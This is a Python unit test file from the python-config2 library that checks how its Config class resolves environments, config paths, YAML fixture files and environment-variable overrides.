2018-10-10T09:16:45.000Z
|
2021-02-08T13:55:37.000Z
|
config2/tests/test_config.py
|
billycao/python-config2
|
d474e911a9ca196dbbeaafdb560f499b885de823
|
[
"MIT"
] | 8
|
2018-10-05T07:12:33.000Z
|
2022-01-03T12:12:39.000Z
|
# =========================================
# DEPS
# --------------------------------------
import rootpath
rootpath.append()
import json
from os import path
from os import environ as env
from attributedict.collections import AttributeDict
from config2.tests import helper
from config2.serializers import yaml_ as yaml
import config2
import config2.config as module
Config = module.Config
deepdict = AttributeDict.dict
# =========================================
# FIXTURES
# --------------------------------------
fixture_foo_root_path = helper.fixture_path('foo')
fixture_foo_src_nested_path = helper.fixture_path('foo', 'src', 'nested')
fixture_bar_root_path = helper.fixture_path('bar')
fixture_baz_root_path = helper.fixture_path('baz')
package_root_path = helper.root_path()
CUSTOM_ENV = {
'A1': 'override',
'A2': 'should have no effect',
'C2': '42',
}
env_variables_file_basename = 'custom-environment-variables'
env_variables_file_content = helper.fixture('foo/config/{0}.yml'.format(env_variables_file_basename)).read()
env_variables_file_content_mapped = '{0}'.format(env_variables_file_content)
for key in CUSTOM_ENV.keys():
env_variables_file_content_mapped = env_variables_file_content_mapped.replace(key, json.dumps(CUSTOM_ENV[key]))
env_variables_file_data = yaml.unpack(env_variables_file_content_mapped)
env_variables_file = {
'name': '{0}.yml'.format(env_variables_file_basename),
'extension': 'yml',
'format': 'yaml',
'basename': env_variables_file_basename,
'raw': env_variables_file_content,
'path': '{0}/config/{1}.yml'.format(fixture_foo_root_path, env_variables_file_basename),
'data': env_variables_file_data,
}
default_config_file_basename = 'default'
default_config_file_content = helper.fixture('foo/config/{0}.yml'.format(default_config_file_basename)).read()
default_config_file_data = yaml.unpack(default_config_file_content)
default_config_file = {
'name': '{0}.yml'.format(default_config_file_basename),
'extension': 'yml',
'format': 'yaml',
'basename': default_config_file_basename,
'raw': default_config_file_content,
'path': '{0}/config/{1}.yml'.format(fixture_foo_root_path, default_config_file_basename),
'data': default_config_file_data,
}
development_config_file_basename = 'development'
development_config_file_content = helper.fixture('foo/config/{0}.yml'.format(development_config_file_basename)).read()
development_config_file_data = yaml.unpack(development_config_file_content)
development_config_file = {
'name': '{0}.yml'.format(development_config_file_basename),
'extension': 'yml',
'format': 'yaml',
'basename': development_config_file_basename,
'raw': development_config_file_content,
'path': '{0}/config/{1}.yml'.format(fixture_foo_root_path, development_config_file_basename),
'data': development_config_file_data,
}
foo_config_file_basename = 'foo'
foo_config_file_content = helper.fixture('foo/config/{0}.yml'.format(foo_config_file_basename)).read()
foo_config_file_data = yaml.unpack(foo_config_file_content)
foo_config_file = {
'name': '{0}.yml'.format(foo_config_file_basename),
'extension': 'yml',
'format': 'yaml',
'basename': foo_config_file_basename,
'raw': foo_config_file_content,
'path': '{0}/config/{1}.yml'.format(fixture_foo_root_path, foo_config_file_basename),
'data': foo_config_file_data,
}
production_config_file_basename = 'production'
production_config_file_content = helper.fixture('foo/config/{0}.yml'.format(production_config_file_basename)).read()
production_config_file_data = yaml.unpack(production_config_file_content)
production_config_file = {
'name': '{0}.yml'.format(production_config_file_basename),
'extension': 'yml',
'format': 'yaml',
'basename': production_config_file_basename,
'raw': production_config_file_content,
'path': '{0}/config/{1}.yml'.format(fixture_foo_root_path, production_config_file_basename),
'data': production_config_file_data,
}
env_config_files = [
development_config_file, # development.yml
foo_config_file, # foo.yml
production_config_file, # production.yml
]
config_files = [
default_config_file, # default.yml
development_config_file, # development.yml
foo_config_file, # foo.yml
production_config_file, # production.yml
]
files = [
env_variables_file, # custom-environment-variables.yml
default_config_file, # default.yml
development_config_file, # development.yml
foo_config_file, # foo.yml
production_config_file, # production.yml
]
default_config_data = default_config_file.get('data')
default_and_development_config_basename = 'default+development'
default_and_development_config_content = helper.fixture('config/{0}.yml'.format(default_and_development_config_basename)).read()
default_and_development_config_data = yaml.unpack(default_and_development_config_content)
default_and_foo_config_basename = 'default+foo'
default_and_foo_config_content = helper.fixture('config/{0}.yml'.format(default_and_foo_config_basename)).read()
default_and_foo_config_data = yaml.unpack(default_and_foo_config_content)
default_and_production_config_basename = 'default+production'
default_and_production_config_content = helper.fixture('config/{0}.yml'.format(default_and_production_config_basename)).read()
default_and_production_config_data = yaml.unpack(default_and_production_config_content)
# =========================================
# TEST
# --------------------------------------
class TestCase(helper.TestCase):
def test__import(self):
self.assertModule(module)
def test__instance(self):
self.assertTrue(isinstance(module.Config(), Config))
def test_env(self):
self.assertTrue(hasattr(module.Config(), '__env__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__env__, None)
config = module.Config('development')
self.assertEqual(config.__env__, 'development')
config = module.Config('foo')
self.assertEqual(config.__env__, 'foo')
config = module.Config('production')
self.assertEqual(config.__env__, 'production')
config = module.Config('xxx')
self.assertEqual(config.__env__, 'xxx')
def test_path(self):
self.assertTrue(hasattr(module.Config(), '__path__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__path__, path.join(package_root_path, 'config2', 'tests'))
config = module.Config(path = package_root_path)
self.assertEqual(config.__path__, package_root_path)
config = module.Config(path = fixture_foo_root_path)
self.assertEqual(config.__path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertEqual(config.__path__, fixture_foo_src_nested_path)
def test_root_path(self):
self.assertTrue(hasattr(module.Config(), '__root_path__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__root_path__, package_root_path)
config = module.Config()
self.assertEqual(config.__root_path__, package_root_path)
config = module.Config(path = fixture_foo_root_path)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
def test_config_path(self):
self.assertTrue(hasattr(module.Config(), '__config_path__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__config_path__, path.join(package_root_path, 'config'))
config = module.Config(path = fixture_foo_root_path)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_root_path, detect = 'not_a_root_file')
self.assertEqual(config.__config_path__, path.join(package_root_path, 'config'))
config = module.Config(path = fixture_foo_src_nested_path, detect = 'not_a_root_file')
self.assertEqual(config.__config_path__, path.join(package_root_path, 'config'))
def test_config_directory_name(self):
self.assertTrue(hasattr(module.Config(), '__config_directory_name__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__config_directory_name__, 'config')
config = module.Config()
self.assertEqual(config.__config_directory_name__, 'config')
config = module.Config(config_directory_name = 'foo')
self.assertEqual(config.__config_directory_name__, 'foo')
self.assertEqual(config.__config_path__, path.join(package_root_path, 'foo'))
def test_config_data(self):
self.assertTrue(hasattr(module.Config(), '__config_data__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('development')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('foo')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('production')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('xxx')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
def test_files(self):
self.assertTrue(hasattr(module.Config(), '__files__'))
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config()
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [default_config_file, env_variables_file]))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('development')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('foo')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('production')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('xxx')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
del env['A1']
del env['A2']
del env['C2']
def test_config_files(self):
self.assertTrue(hasattr(module.Config(), '__config_files__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, [default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('development')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('foo')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('production')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('xxx')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
def test_default_config_file(self):
self.assertTrue(hasattr(module.Config(), '__default_config_file__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
def test_env_config_files(self):
self.assertTrue(hasattr(module.Config(), '__env_config_files__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config(detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config(path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('development')
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('foo')
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('production')
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('xxx')
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
